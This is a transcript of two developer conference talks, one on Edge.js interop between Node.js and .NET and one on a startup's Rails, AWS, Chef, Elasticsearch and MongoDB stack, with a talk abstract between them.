And so it's a little bit worse. It's nine times slower than a native function call. But this last one here, that is a ServiceStack web service, ServiceStack by all accounts being the fastest web service framework that you can build on .NET. And you can see the latency. This is a web service running locally, so we're not even taking network latency into consideration in the process. So if you've got some code in .NET that you want to execute, you might think, well, I'll just create a web service on top of it. And that's the kind of performance penalty that you're hitting. And similarly, if you write an external application and you shell out and, you know, execute that application out of process, you're going to see similar latency issues. So this is what Edge was designed to solve: this performance and latency issue. Installing Edge is very, very easy. You'll need Node.js 0.6 or later. You'll need .NET Framework 4.5 or Mono 3.4. The reason these versions are important is that these support async and await. So because Node is single threaded and completely asynchronous, you need to have that async support inside .NET to, you know, be able to run on that same thread so it doesn't block and cause problems for Node. Open up a command prompt or terminal within your OS. Change to your project folder and type npm install edge. npm, being the package manager for Node, if you're not already familiar, makes it really trivial to pull down packages. Now up until, I guess, a month or two ago, Windows was required for Edge. And it's just now become supported on Mac OS X and Linux. So what does an edge.js app look like? This is a JavaScript file. You might imagine this being helloworld.js. The first line is a require of edge. So coming from a .NET world, this is kind of like your using statement. This is how you reference a module or reference an external library. So we're saying we're referencing Edge.
And then next, we're declaring a function called helloworld. And the definition of that function is edge.func. And then everything that's in that string is C# code. It's an anonymous function with the async keyword out in front, letting the compiler know that this should run asynchronously. And we're just taking the input that was sent to us and returning it as a string. So then we call that function after we declare it. And I'm passing in I love bacon, because that's obvious. And then in typical Node.js fashion, you have a callback function. That callback function expects two parameters, an error and a result. We're checking to see if there was an error there, and then we just console.log the result. This is a typical pattern in Node.js; this is how we do the asynchronous work. We invoke a function, and instead of expecting an immediate result, we're saying, when you're done, call this function. So opening up a command prompt or terminal window and typing in node helloworld.js, this is how you run a Node.js application. It just simply spits out I love bacon. So let's take a look at some demos. I've got basically that same code that I showed you on the screen. In this case, it's a little bit longer because I've wrapped this in a comment. So this is how we express C# if you're doing inline code: you put it in a JavaScript comment block. That's so JavaScript, or Node, doesn't blow up when it sees C# code. So that's kind of ugly, but it gets the job done. That's one way you can do Node. The next example, hello file, gives us the same output. But this now is referencing a file, demo.cs. And this file demo.cs is basically the same thing. But now you can see we could separate our JavaScript code from our C# code. We can put some tests around that. We could have a better development experience. We're separating those concerns. A common question is, well, how does data get marshalled from Node to .NET?
And what are the data types? And how does that look? So the output from this is data from Node.js to .NET. We've got an integer, a number, and a string. We can see that all these get passed into the types that we would probably expect in .NET: we have Int32, Double, String, Boolean. An object gets converted to an ExpandoObject, for dynamic. An array gets translated into an array of objects. And vice versa, when we pass data from .NET back to Node, JavaScript being somewhat typeless and dynamic, it just translates those appropriately into numbers and strings and Booleans and objects and arrays as well. And this code looks like this. This is on the JavaScript side. This is the data I'm going to send to our .NET function. I've got an integer and a number and a string, an object, an array, and so forth. And I'm referencing a .cs file, data marshalling, and then I'm calling that function, passing in the data to send to .NET. And this is a lot of code to look at. Everybody, is the font size okay? All right. So basically, I'm just iterating over, looping over the data that gets passed in. The thing to point out here is that the input that comes from Node into .NET is an IDictionary<string, object>. So this is the signature that edge.js expects you to implement when creating a function that's going to interact with edge.js. So it needs to be async, and the input will be an IDictionary<string, object>. And then on this line here, this is where I'm casting my values. So I'm saying data, cast to an IDictionary<string, object>. And then I'm looping through that and writing out the results. And then when I'm done, I'm creating a new anonymous object and returning that, so that Node then turns around after it receives its result and writes the result out to the screen. Again, IDictionary<string, object> is what's expected.
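The mapping just described can be summarized with a small sample payload. This is plain Node, with no edge.js involved, so the "marshalling" here is only illustrated in the comments; the property names are made up for the example.

```javascript
// Sample payload of the kind you would pass into an edge.js function.
// Comments show the CLR type each value is marshalled to, per the
// mapping described above.
var payload = {
    anInteger: 1,              // System.Int32
    aNumber: 3.14,             // System.Double
    aString: 'bacon',          // System.String
    aBool: true,               // System.Boolean
    anObject: { id: 7 },       // ExpandoObject (usable via dynamic)
    anArray: [1, 'two', false] // object[]
};

// On the .NET side the whole payload arrives as a single
// IDictionary<string, object>, so values are looked up by key name.
var keys = Object.keys(payload);
```

The same translation runs in reverse on the way back, which is why an anonymous object returned from C# shows up in the callback as an ordinary JavaScript object.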
So for folks that already have an existing code base of .NET that they want to leverage in Node, the pattern that you probably want to implement is some type of proxy class that's going to wrap calls into your existing code. You have a question? All right. Next example: hello SQL. So I have a VM running Windows 8 and SQL Server 2012, I think. And I'm calling into .NET to go and fetch some data out of that SQL Server for me, and then I'm just writing that out to the screen. What this looks like: basically the same thing. I'm referencing a file, and I have a page that I want to request. So I'll change current page, go back and run this, and I get a different set of users, as I would expect. The code itself is pretty straightforward. I've got this same signature, public async Task; it returns a Task of object, and I'm passing in, I don't have to cast, so the signature can be an IDictionary<string, object>. And then I'm defining my query; I'm using a common table expression to do paging in SQL. And I'm creating a query task, Task.Factory.StartNew, and I'm passing off that query and the input parameters down to this code down here. So a couple of things to point out with what's going on here. One is, ADO.NET does have support for async and await. So there's an asynchronous command open, an asynchronous execute reader; there's all these async commands. Unfortunately, the Mono version of the ADO.NET driver doesn't support all that stuff. And so I'm kind of having to just execute all that using the Task Parallel Library, using the task runner. And so this gets executed in the CLR thread pool. That may mean that the code is actually executed on the same thread, or .NET may decide to spin up another thread to execute this code. Either way, it's non-blocking and it's not going to cause a problem with Node.
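From the Node side, the hello SQL call just described is shaped like any other edge call: paging parameters go in, users come back through an (error, result) callback. A sketch with a made-up stand-in for the edge-bound function, so it runs without edge.js or SQL Server; the names and sample rows are invented for illustration.

```javascript
// Stand-in for the edge-bound query function; a real one would be
// created with edge.func(...) and run the CTE paging query in .NET.
function queryUsers(input, callback) {
    var all = [{ name: 'Ada' }, { name: 'Linus' }, { name: 'Grace' }];
    var start = (input.currentPage - 1) * input.pageSize;
    // edge.js callbacks follow the Node convention: (error, result).
    callback(null, {
        totalRecords: all.length,
        users: all.slice(start, start + input.pageSize)
    });
}

var result;
queryUsers({ currentPage: 2, pageSize: 1 }, function (error, data) {
    if (error) throw error;
    result = data;
});
```

The point of keeping this callback shape is that callers can't tell whether the rows came from .NET, and the blocking database work stays off Node's single event loop.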
So the other thing I wanted to point out is this connection string that I'm getting for SQL Server is coming from an environment variable. So in the world of Node and these other platforms, there's not such a thing as an app.config or a web.config that we're used to in .NET. So you have to set environment variables. Like if you're going to host a Node.js application in Azure, when you go to set up that instance, as part of the configuration there's a section that has environment variables, key-value pairs, where you can just arbitrarily put in whatever is required for your application. And there's an edge-sql module that pretty much wraps all this for you, so you can do inline SQL from Edge, and it expects an environment variable named EDGE underscore SQL underscore CONNECTION underscore STRING. All the rest of the stuff is .NET code going out and fetching those using a reader and writing those results out. And then last, I have an example here of calling an assembly. It's doing pretty much the same thing that I just showed you that was in that external file. In this case, it's returning an object that has, you know, how many records did it return, what are the total number of records, and then an array of those objects. And the code looks like this. So this is how you reference an assembly from edge.js. When you're declaring the function, you pass in an object that includes the path to the assembly file. So I've got a file sitting out here called edgeDemos.dll. The type name, so this would be the name of the class that you're referencing, and then the method name. So I have a method named queryUsers on a class named edgeDemos.dapperTests. And then I'm passing in the same page data, current page and page size, and then we're writing that out to the console. Now, the code for this, I've got this in Xamarin.
Xamarin Studio, of course, is the way to do .NET development on Mac, and it works really, really well. If you haven't checked this out before, it's pretty awesome. So again, I'm getting a connection string from my environment variable, and I have this public async Task queryUsers, and I'm returning a paged query. In this case, I'm using Dapper, which is a great micro-ORM. It runs fine on Mono, and I can do some pretty interesting things with Dapper. Dapper is a dynamic micro-ORM that just runs off the SQL connection; it creates extension methods on your connection object. So you create a connection, and you can do things like .Query, .QueryMultiple, lots of really cool things. So your code with SQL Server becomes really small and tight. All right. So, what else can you do with Edge? Well, just kind of think about some of the other things, because we now have access to .NET from Node, some things that you can do with Edge that you can't do from Node immediately. Of course, the Windows Event Log, doing things with performance counters, accessing the registry on the local machine for whatever reason you may have, doing things like printing, again, like accessing hardware, whereas today you would have to shell out to some kind of external program from Node to do that. You could invoke that directly from your Node app. Maybe 3D printing, I don't know. Accessing other hardware like the camera, the microphone, or other devices that are on the computer. Doing things like video encoding and image processing and other CPU bound work. So Node being single threaded, it works awesome for, you know, web requests and for serving up data and for processing or sending down files or doing socket-based operations, but it's not ideal for doing real CPU intensive operations.
Normally you would have a C module that Node would invoke to do that work, but now, in this case, you can write those kinds of CPU intensive operations in .NET. Another interesting possibility is PowerShell, you know, being able to have Node.js exposing some API on your network and being able to kick off other operations or do other automated things from Node. Another thing that's not readily available in Node is doing security-related work, like generating certificates or doing encryption. It's not really well suited for that. Recommendations. I would prefer, as much as possible, if you're going to go with edge.js, to separate your .NET code into external class libraries versus inline code, or at least separate it into files; you know, the development experience would be a whole lot better if you're using, like, Visual Studio for doing your .NET work and, you know, having tests around your edge.js code. Anytime you're using edge.js, I would wrap that in a separate module. The way Node works, it makes it very easy to separate your code into other modules. It's kind of like separating into other class files. And the reason I recommend this is that maybe you're approaching Edge as a migration strategy. And you're wanting to move toward a Node.js application, but you need edge.js to give you that stopgap, or, you know, a bridge to get you to Node eventually. So by wrapping it in separate modules, you can easily swap those out for native JavaScript modules at a later time. I would recommend that you benchmark and test thoroughly. My experience with edge.js so far has been great, but, you know, you just never know. It depends on your particular situation. You may have some legacy code that you need to invoke from Node. You know, who knows what kind of threading or blocking issues may come up.
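The wrap-it-in-a-module recommendation above can be sketched like this. The module and function names are made up, and the edge-backed variant is stubbed so the sketch runs without edge.js; a real one would delegate to a function created with edge.func.

```javascript
// users.js: callers depend only on this module's contract, not on how
// it is implemented, so an edge.js-backed version can later be swapped
// for a native JavaScript one without touching any caller.

// Hypothetical edge-backed implementation (stubbed here; in reality it
// would call into a .NET assembly via edge.func).
function edgeBackedGetUsers(callback) {
    callback(null, [{ name: 'Ada' }]);
}

// Native JavaScript implementation with the exact same contract.
function nativeGetUsers(callback) {
    callback(null, [{ name: 'Ada' }]);
}

// Flip this one line when migrating away from edge.js.
var getUsers = edgeBackedGetUsers;

var users;
getUsers(function (error, result) {
    if (error) throw error;
    users = result;
});
```

In a real module you would expose getUsers via module.exports; it's inlined here so the sketch is self-contained.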
You really need to test and make sure that the performance, the scalability, your memory footprint, all those kinds of things, are still in line. It is possible with Edge.js to go the other direction, from .NET into Node: from a .NET application, you can invoke Node, run stuff there, and still be in the same process, with the benefit of very low latency. Personally, I can't think of a good use case for that direction; maybe there is one. My preference is the one-way Node.js-to-.NET scenario, but there could be other scenarios. Always remember to use async; it's a big no-no to block that single event loop in Node. And if you're on Visual Studio, you may or may not be aware that there is a beta of Node.js Tools for Visual Studio out on the Visual Studio Gallery. It's actually very impressive. You can create Node.js projects inside Visual Studio, you can set breakpoints, and you can step through your JavaScript code just like you would in C#. It's a great experience; I highly recommend you check it out if you haven't looked at Node yet. So: if you can write it in Node.js, obviously, that's the best choice. You're going to get the lowest latency, and your maintenance over time is going to be much, much easier. Going back to that performance chart I showed earlier, maybe a web service is perfectly acceptable. Maybe it's a once-in-a-while type of operation that you need to invoke .NET for. Maybe every now and again you need to trigger something that goes out and generates a report. In that case, a web service may be perfectly fine for your situation, and you don't need to go with Edge.js.
You can still have some folks developing those web services in .NET and other folks developing in Node. Another great strategy is a message-based architecture. I could talk about this for a long time; there are a lot of benefits beyond just this particular scenario. A message-based architecture means having a message bus like Service Bus, RabbitMQ, or ZeroMQ sitting in the middle, and your application may just say: I don't need to know the result yet, I just need to publish a message onto the queue, and somebody else is going to pick that up and do some work with it. That's a great integration strategy. So here's an updated benchmark. I've got the same data, but in the second column, I'm publishing a message to RabbitMQ. It's still a little bit slower than a pure JavaScript function, but it's faster than Edge in this case. In this particular scenario, I'm just doing fire-and-forget. I'm not expecting the result back; I'm just saying, go run this report and email the results, or something like that. So in this case, using messaging is a great solution instead of calling into .NET directly. I can have a .NET Windows service listening on that message queue that picks the message up and does the work. To wrap up, I was just going to share what we're doing at LeanKit. We're moving to a message-based architecture as well, and we're finding that Node is a great fit for some isolated services. It's great for the things it does really well: APIs, message-based architecture, concurrency, being able to spin up multiple services, and being able to host these on Linux machines, which are a lot cheaper to run. And all the guys on my team, and most of the guys in the company, have been on .NET for probably 10 years or more.
I know I've been on .NET since 1.0; I guess that's around 2002 or something. And our experience so far in picking up Node has been fabulous. One of the guys on my team said that about two weeks in, he felt completely immersed, productive, and comfortable, and that he'd rather stay in Node. So it's a lot of fun. It's brought a lot of energy to our team and a lot of momentum to our development. We've been able to crank out some really awesome things, especially now that we're doing a message-based architecture. We've got that great separation of concerns, where we can have one Node service that listens for some messages and does that one thing, and we don't have to create these monolithic applications like we've created in the past. I've heard similar anecdotes from other developers that have gone from .NET to Node. And of course, all these young whippersnappers coming out of college are really looking to stay in JavaScript as well. That's all the content that I have. I know we've got some time left over for questions. But for that, thank you very much for sitting through my talk. All right. We've got some time for questions. Anyone? Yes, sir? So, calling a .NET console application from Node: it's certainly possible. There are a couple of ways you could do that. Since it's going to be out of process anyway, there's probably a way in Node to execute an external application directly, so you may not even have to use Edge, but I'm not 100% sure of that. If you wanted to use Edge, you could do it a couple of ways. You could have some inline .NET code that basically uses the Process API to execute it arbitrarily, pass parameters, and so on.
Or you could have an external class library that takes that input, creates the parameters out of that dictionary of string to object, and then executes the console app. So maybe you'd recommend something like Process.Start? Right, right. Something like Process.Start would be my best guess. Yes, sir? Do you set up a new app domain for each method call, or is it kept alive? Okay, so the question is whether it sets up a new app domain for each method call. My understanding is that it creates one app domain, and for every method or anonymous block of code in your Node.js application, however many libraries you're referencing, it loads those all up into the same app domain. You've still got the one single thread. And your inline C# code, or C# code in an external file, gets compiled one time, and then the compiled version gets executed every time you call that function. Anyone else? All right, well, I'll be around. You can find me on Twitter at ReverentGeek. I've got an article, "Leverage SQL Server with Edge.js," that walks through, from start to finish, pretty much the things we talked about here: step by step, how to get to SQL Server. And Tomasz Janczuk, on his blog and on GitHub, has a ton of examples. Just about anything you want to do between Node and .NET is out there. So again, thanks. Enjoy the rest of the conference. Oh, and I do have some swag up here if anybody wants to take some free stuff, so I don't have to carry it back with me. I've got some... I mean, not mouse pads. Those would be terrible mouse pads. Those are cell phone wallets.
You can stick it on the back of your phone and put your room key, your credit cards, or business cards in it. Yeah, it's a very, very tiny mouse pad. Thank you so much for the talk. Thank you.
Are you a .NET developer who wishes to jump into Node.js, but can’t abandon the .NET infrastructure in your organization? Are you a Node.js developer who needs access to libraries in the .NET world? Edge.js makes it possible to run Node.js and .NET code in one process, allowing interop between the two. In this talk we’ll explore ways to leverage the best of both worlds.
10.5446/50541 (DOI)
I'll get started then. I'm Ealing. I used to be a consultant and developer. I'm still a developer, but after I decided to do a startup, I'm also a DevOps architect, front-end developer, and a salesperson dealing with legal stuff and accounting. So if this presentation is a bit all over the place, it's because that's my daily life. We decided to build a software-as-a-service for businesses, or consultancies. We started out, obviously, very simple, with just a small application, and I want to talk about how that evolved into quite a big application. Just to give you an impression of how this evolved graphically: this is the first ugly prototype, which turned into this. This is the first time I got a designer to help me out; I sent this to him and said, make it look nice. The next iteration looked a bit like this. And then I got my co-founder, who is an interaction designer and also does a lot of front-end and graphic design, to help me out. So it started to shine a bit more. That's just how it looks, but it kind of illustrates the development on the technology side as well, although I wouldn't swear on my grandmother that the tech is as pretty. We try. The last place I worked before I started this was at Forward in London, and we were doing lots of Ruby on Rails applications. So that was my programming language and framework of choice when I wanted to create something fast. I felt confident and productive in it, so I just stuck with that and decided to go for it. My experience with that has been good, and it still keeps me quite productive. There have been a few issues. Obviously, there have been a lot of security patches for Ruby and Rails over the last few years, but they've gotten around that, and as long as you keep up to date and just monitor it, it's very easy to apply them. It usually goes fast. They've kind of taken it to another level now, I feel, although you have to pay attention.
Another thing, and that might not just be a Rails thing: in terms of gems, or libraries, it's very easy, when you have a problem, to just search for a solution. So, we're using MongoDB, and I'll talk a bit more about that later. I started using MongoDB, and then I wanted to have some kind of history, so you can track changes to the models. I just googled that and found a plugin, a library, for it. Then we had pictures, images, that we wanted to store, so there's a library for that. Then we needed OpenID so we could authenticate with Google, et cetera, and we wanted to store parts of those tokens in the database, so there was a library for that. And it goes on and on. If you don't think about it and just pull in a lot of libraries, you can end up with quite a lot of small libraries that someone just made once and threw out there, and when it comes around to upgrading to a new version of the main library, the other ones might not be updated. I ran into that quite a few times. When I started looking at it, one of these libraries was, I don't know, 70 lines of code, and I had spent a day trying to figure out how to upgrade it, until I just looked at it and thought: okay, I'll just write it myself, or fix it. So that's something to pay attention to. We ran this on Heroku. I don't know if you know about Heroku, but it's very simple to get started: just git push, and it's running. For some technical subtleties, we decided to move it to Amazon Web Services and run our own servers. We started out with one server, and now we have at least 12, probably more. We also run it in a secure zone, which is called a VPC, or Virtual Private Cloud, which basically gives you the ability to define subnets. So we have two load balancers in the DMZ. We have a VPN server that you have to connect to if you want to deploy to the servers.
And a NAT server that takes care of the outgoing, or I guess outbound, traffic: if some of these servers need to download something from the internet, they have to go through it. They are not exposed to the net at all. We have one zone with the app servers, and then the databases, search engines, et cetera, run in a third zone. I'll get into details about this later. Amazon Web Services I was a bit familiar with before I started out, and it's been working quite well. The Virtual Private Cloud stuff takes a while to understand and set up, but once you have it set up, it's very reassuring to know that the data is fairly safe and that only you can access these things. There are a few tricks I learned. For example, the default settings for the load balancer. The load balancer steers incoming traffic to servers, and you attach a server to it. The load balancer pings the server on some URL to make sure it's online, and if it's not, it will take it out of rotation and hopefully switch to another one. But when you're starting out small, you might have just one server. If something goes wrong on that server, the load balancer will take it out. Then you fix it, and you want it back up as quickly as possible, but the default settings for these health checks are something like 30 seconds times 10 checks. So you fix it, and then you have to wait five minutes, ten minutes, whatever, for the load balancer to actually recognize that it's working again. So I just lowered that to the lowest possible values for now, and if we ever have ten servers, maybe I'll raise it again so we have a higher threshold. Feel free to ask questions as we go along, by the way. I would love it if we got some interaction here. There's no big conclusion at the end; I'll just go through our stack, so feel free to stop me. Another very important thing is security.
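As a quick aside, the health-check arithmetic mentioned above works out roughly like this; the numbers are the "30 seconds times 10" figure from the talk, not exact ELB defaults.

```javascript
// Back-of-the-envelope recovery time for load-balancer health checks: the
// server must pass `healthyThreshold` consecutive checks, one every
// `intervalSeconds`, before traffic comes back to it.
function recoveryTimeSeconds(intervalSeconds, healthyThreshold) {
  return intervalSeconds * healthyThreshold;
}

const slow = recoveryTimeSeconds(30, 10); // five minutes of waiting
const fast = recoveryTimeSeconds(5, 2);   // ten seconds with lowered settings
```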
And security has been kind of a main driver for a lot of this. You start out and just prototype something, build it, deploy it on Heroku, and you think everything is fine. But then you start selling this stuff to big clients, and they have a lot of security requirements for you. You have to document your security, and you have to be sure that everything is secure. That's one of the reasons we went for this Virtual Private Cloud thing, which makes it really hard to access the servers. But then Amazon Web Services has a web interface, and we have code on GitHub, which has a web interface, et cetera. So we have turned on two-factor authentication on everything. If I need to log in, I always have to use the codes from my mobile. Just think about the weakest link all the time. So security has been one driver, and privacy has been another one. When I first started this, I didn't think I would have to answer questions about privacy, like: where is your data stored? How do you keep it from others? Et cetera, et cetera. Fortunately, we were able to get away with this as long as we run on Amazon servers in the EU. Basically, our servers are in Ireland, and that more or less works within the Norwegian law and requirements. It's important to understand these things and actually take them seriously. These are non-functional requirements that can drive your architecture and design and limit your options a bit. But obviously, with 12 servers or whatever in the cloud, and basically two people in the company doing a lot of different things every day, it's not every day I set up a new server. I do it, and I leave it running. I might set up another one, a different type, later, but it's very hard to remember how you do these things. So one day I woke up, and the search server instance was just unreachable. It wasn't really there anymore.
That can happen when you run servers in the cloud: they get stuck, something happens. It's very easy to fire up a new one, but you need to configure it, and you need to deploy to it, right? So how do you do that, how do you remember how to do that, and how do you make sure you can do it fast when the roof is falling down, so to speak? We decided to use Chef. Have you heard about Chef? It's an infrastructure automation framework, like Puppet, also written in Ruby, so that's probably why I chose it. It allows you to define, basically programmatically, how your servers will be set up. On the web server, I install Git and NGINX, which routes traffic to the app; Unicorn, which wraps the app in a container; and different custom stuff that I have for running background workers, et cetera. You specify this in code, and you run a command on the server that goes through all this code and makes sure everything is installed, all the folders are created, the users have the right permissions, et cetera. Everything is just there. So if I need another identical server, or I need to make another server, I just run that. That has given me a lot of confidence and helped me get some sleep. So that has been very nice, essentially.
And the good thing is that, you know, how to install all these application servers or services, whatever, there are what they call cookbooks. There are already recipes online. People have done this before. So if you're lucky, you can just Google how to, like, Chef NGINX, and you'll find the cookbook, and it just works out of the box, and you can customize some attributes most of the times. But like all other open source kind of ecosystems, sometimes these are just things that people made in a hurry and just put it out there. So I wanted to do, like, set up MongoDB in a replica set with some properties, and I found one that can do a replica set, and I found another cookbook that could set the property, but not one that could do both. So I had to write my own or take parts from here and there. So that's something to look out for. And Chef is nice, but it's very far from perfect. There's a talk about Docker later on, which I'm hoping is the new Silver Bullet. So we'll see about that, but it's helped us get quite far, but it's quite a bit of a learning curve, and it's a lot of effort. So that was a bit about the infrastructure. Client-side-wise, we have, well, it's almost a single-page web app, but it's more like a three-page web app. Anyways, we've been using lots of JavaScript or CoffeeScript. I really enjoy CoffeeScript. It's probably because it's quite similar to Ruby. I haven't had any issues with it at all. It's easy to debug. You see, even though it's not always the same line number because it expands, it's when it takes a CoffeeScript function and turns it into a JavaScript function, it automatically gets a bit bloated because you have to have the curly brackets and some other stuff. But it's very easy to debug still, which is what I hear people are a bit afraid of, but that's never been an issue for me. What can be tricky sometimes is that, I don't know if I can find an example of that. Some, the way the syntax works, I can show you. 
JavaScript has this setTimeout function, where the function is the first argument and the milliseconds are the last argument. CoffeeScript, however, is very nice in that you can do things like this: you pass in an argument, and then, as long as the last argument is a function, you can just use an arrow and indent the contents afterwards. But the native setTimeout function in JavaScript is the other way around. One trick is to wrap it in another function that switches the arguments, and then you can use the CoffeeScript syntax. That's more or less the only challenge I've had with it. We have also been using Backbone.js. I guess that was very much hyped at the time we started. It's been working out well enough. If you compare it to other client-side frameworks, it doesn't do that much: you have to do all the bindings to the forms yourself, manually. The good thing about it is that it's not that intrusive, and it's fairly flexible, but you do end up writing a lot of boilerplate code. I'm not sure I want to replace it with something like Angular yet, but I might get there one day. I had the same issue here as with Ruby and Rails: at least when you start out with something, you don't know it that well, and when you have a problem, you want to solve it, so you google for the solution and find a library that does it for you. For example, I had a nested model. You would have a model with a name and attributes, and then you might have children, an array with things inside. I couldn't easily figure out how to split that up, or how to do it with Backbone. You have collections and models in Backbone, so you would have a collection of the top model, and then each of these models would have a children collection, which again would have their own models.
To begin with, I couldn't figure out how to do this, but someone had made a library called Backbone Relational, which is, I think, 2,000 lines of code, probably twice the size of Backbone itself. So I pulled that in, until one day I figured out how to do it myself, and it was very simple. I could then delete 2,000 lines of code by adding around 30. It just saved a lot of code: I could delete all of this by using a simple parse method. I don't know if you can see it here, but it's basically just doing this, splitting it out into the separate models myself. So that was a lesson learned. The nature of our application is that it's essentially a CV database which stores all your skills and projects and everything you've done. Sometimes salespeople, for example, want to search and find skills, and we also want to give people auto-completion, suggestions, et cetera. So we needed a search engine, and the obvious choice was Elasticsearch. It's very scalable, it's got a JSON API, and it was really, really easy to get started with. We already had the data in JSON, so I just threw it in there, searched, and things came back. It seemed to work. Very nice. Until you start fiddling, or running into edge cases. An example would be searching for "C#" or ".net" or something like that. By default, like a good search engine, Elasticsearch will strip out stop words and punctuation and all this, so you have to specify an analyzer that does not do that. What we ended up with for the big text fields looks like this. This is a regular expression pattern that splits on commas and whitespace, I think, and also on periods, but not if they are at the beginning of a word, because of ".net". This was not standard, but Elasticsearch is very flexible, so you can specify it; it just took me a while to understand how to create and specify this.
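A sketch of what such an analyzer definition might look like; the names and the exact pattern here are illustrative, not the production mapping. An Elasticsearch pattern tokenizer defines the separators, so splitting only on commas and whitespace keeps tokens like "C#" and ".net" intact instead of stripping them as punctuation.

```javascript
// Analysis settings with a pattern tokenizer (illustrative names/pattern).
const analysisSettings = {
  analysis: {
    analyzer: {
      skill_analyzer: {
        type: 'custom',
        tokenizer: 'skill_tokenizer',
        filter: ['lowercase'],
      },
    },
    tokenizer: {
      // Split only on runs of commas and whitespace.
      skill_tokenizer: { type: 'pattern', pattern: '[,\\s]+' },
    },
  },
};

// The same split, reproduced in JavaScript to show what the pattern does:
const tokens = 'C#, .NET, Elasticsearch'.split(/[,\s]+/).filter(Boolean);
```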
And the same goes for this: let me show you an example use case. You fill in, say, a customer, and you get suggestions, and then some more suggestions. All of these come from the API, and we also have tags here. The problem is, whether I start typing "java" in lower case or in upper case, I really mean the same thing: I want it to hit the same thing, I want it to be case-insensitive. What Elasticsearch usually does by default is lower-case everything. It stores everything lower-cased, and all the search phrases that come in go through the same filter, which also lower-cases your search terms, so you are always matching lower case against lower case, which is very nice. Until you want to use something like facets, which typically gives you the top ten skills, which is what we use for these kinds of recommendations and suggestions. The problem is, if you get the top ten and they are all lower-cased, you cannot use them. So we figured out you could actually use a multi-field mapping, which looks something like this. You have a description, which is stored twice: one copy goes through an analyzer, and one copy is stored untouched, basically not analyzed at all. That means you have to specify, when you search, that you want to search in this field, but when you want the facets, you use the untouched one, et cetera. It takes a while to get all these things right, and there are still some edge cases we are working out. You end up with quite a huge mapping. Obviously, you can generate most of it with code, and there are some good frameworks wrapping it, but it takes a while to get everything right. But I still really like Elasticsearch. Another issue is similar to what I had client-side: you have a nested document and you want to search in it. There are two ways to store this in Elasticsearch, two ways to map it.
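Before the nested-document issue, here is roughly what such a multi-field mapping looks like. The field names are invented, and the syntax is the `multi_field` style of Elasticsearch at the time: the same text is stored twice, an analyzed copy for search and an untouched copy for facets, so "Java" comes back as "Java" and not "java".

```javascript
// A multi-field mapping: one field, two representations (illustrative names).
const descriptionMapping = {
  description: {
    type: 'multi_field',
    fields: {
      description: { type: 'string', analyzer: 'skill_analyzer' }, // for search
      untouched: { type: 'string', index: 'not_analyzed' },        // for facets
    },
  },
};

// Queries target `description`; facet requests target the raw sub-field.
const facetField = 'description.untouched';
```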
You can say: okay, we store it as one document, and this document has lots of child documents. The problem is that when you search and find a match, it returns the whole parent document; it never returns just the children. To be able to do that, you have to store them as separate documents and specify a parent-child relationship, which is okay, but it takes a while to try out all these things and get them right. We also had to make sure the search engine stays live and responsive; it turned out to slow us down if we didn't ping it all the time. So, like with everything else, we just set up something that pings it. Elasticsearch has a very good developer community, though. The company behind it is actually headquartered in Amsterdam, I think. There have been several Elasticsearch meetups here in Oslo with the people who actually build this thing; I think Martin is even here at the conference. That's been a really good thing for me. I met them, talked to them, and they actually fixed some issues I found really fast. I really look forward to seeing how it develops. Then MongoDB, the NoSQL database. It made sense: we have CVs, they are documents, we have them in JSON, so throw them into MongoDB and don't worry about schemas or anything. It's been very nice for a long time. I haven't had to worry about migrations or data types; I just pushed data in there. It's probably one of the reasons we've been able to develop this as quickly as we have. However, when you do have to do migrations, like moving a field, it's not straightforward. You can write some custom JavaScript that you run on MongoDB, or you can write it in Ruby.
You can read the field out of one document, write it into the new place in the other, and then have another script that cleans it all up afterwards, which is something you get a bit more for free with the usual database migrations on a SQL database, I think. And I'm starting to feel the pain of not having joins. You have lots of documents, and it's nice when you just retrieve the whole document and that one document is what you asked for. But when you need 200 documents, and you need some information from this one and some from that one, it just takes a bit longer than it should, I think. So I've been looking a lot into Postgres, which now has quite extensive JSON support, actually, in 9.4. At the moment, I'm feeling I should say goodbye to MongoDB and go back. I'm not sure yet, but I think that's where we're heading. MongoDB scales okay, but the way you configure it is quite tricky, I think. We have three MongoDB servers, which is called a replica set. You have to have three because they vote; if you have two, they'll never agree. So you always have to have the third one, and if you go beyond that, you have to have five, seven, et cetera. The challenge is that when you want backups, you don't want to take them from the master. So you can specify that one of these servers can never be elected master: it has a priority of zero and is hidden from the set, but it is still part of the voting. That's the one you take the backups from. And there are three, four, five different ways of backing up MongoDB, but most of them are just "not recommended, not recommended, not recommended." The only recommendation is to snapshot the entire disk and store that, and that's what we do. It's easy with Amazon, but it feels a bit weird, because if you do have to recreate something from the backup, you have to start a new server, attach that backup image, and go from there.
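The replica set just described might be configured like this. It is the config document you would hand to rs.initiate() or rs.reconfig() in the mongo shell, with invented host names: the third member has priority 0 and is hidden, so it can never be elected master and clients never read from it, but it still votes, and that's the member the disk-snapshot backups are taken from.

```javascript
// Three-member replica set with a hidden, priority-zero backup member.
const replicaSetConfig = {
  _id: 'rs0',
  members: [
    { _id: 0, host: 'db1.internal:27017' },
    { _id: 1, host: 'db2.internal:27017' },
    // Backup target: votes, but never elected and invisible to clients.
    { _id: 2, host: 'db3.internal:27017', priority: 0, hidden: true },
  ],
};
```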
Amazon does have quite good support for taking snapshots of your disks, though. The other hard part was actually generating documents. When we started out, we thought we could get away with just doing PDFs, and there are frameworks out there that can generate PDFs from HTML; they work like this. That's where it started, until people started demanding .doc and .docx, et cetera. So we had to figure out: how do we generate documents? I don't come from the Microsoft world, so this was a bit new to me. What we ended up with was using Word templates. It looks a bit like this. We found a framework, a third-party application, that takes these placeholders, which look almost like built-in merge fields but are really just plain text, and replaces them with real merge fields, and then runs the document through OpenOffice. So you post some JSON to it, and out comes a Word document. It works, and it's quite flexible, but there are lots of edge cases. For example, transparent images won't be transparent when they come out the other end. You can't float everything the way you want to. There are sometimes differences between the .docx and the PDF, and some of these are due to bugs or missing features in OpenOffice. So it works, and we always figure out how to do things, but it's a steep learning curve, and we want our customers to be able to do this really fast and easily. So what we're looking at now is: can we do this another way? We want to have a drag-and-drop interface and just generate the documents from there. We looked into Apache POI, which I think is really good for Excel documents; they've kind of reverse-engineered the formats. But then read this sentence: we do not have someone taking care of this.
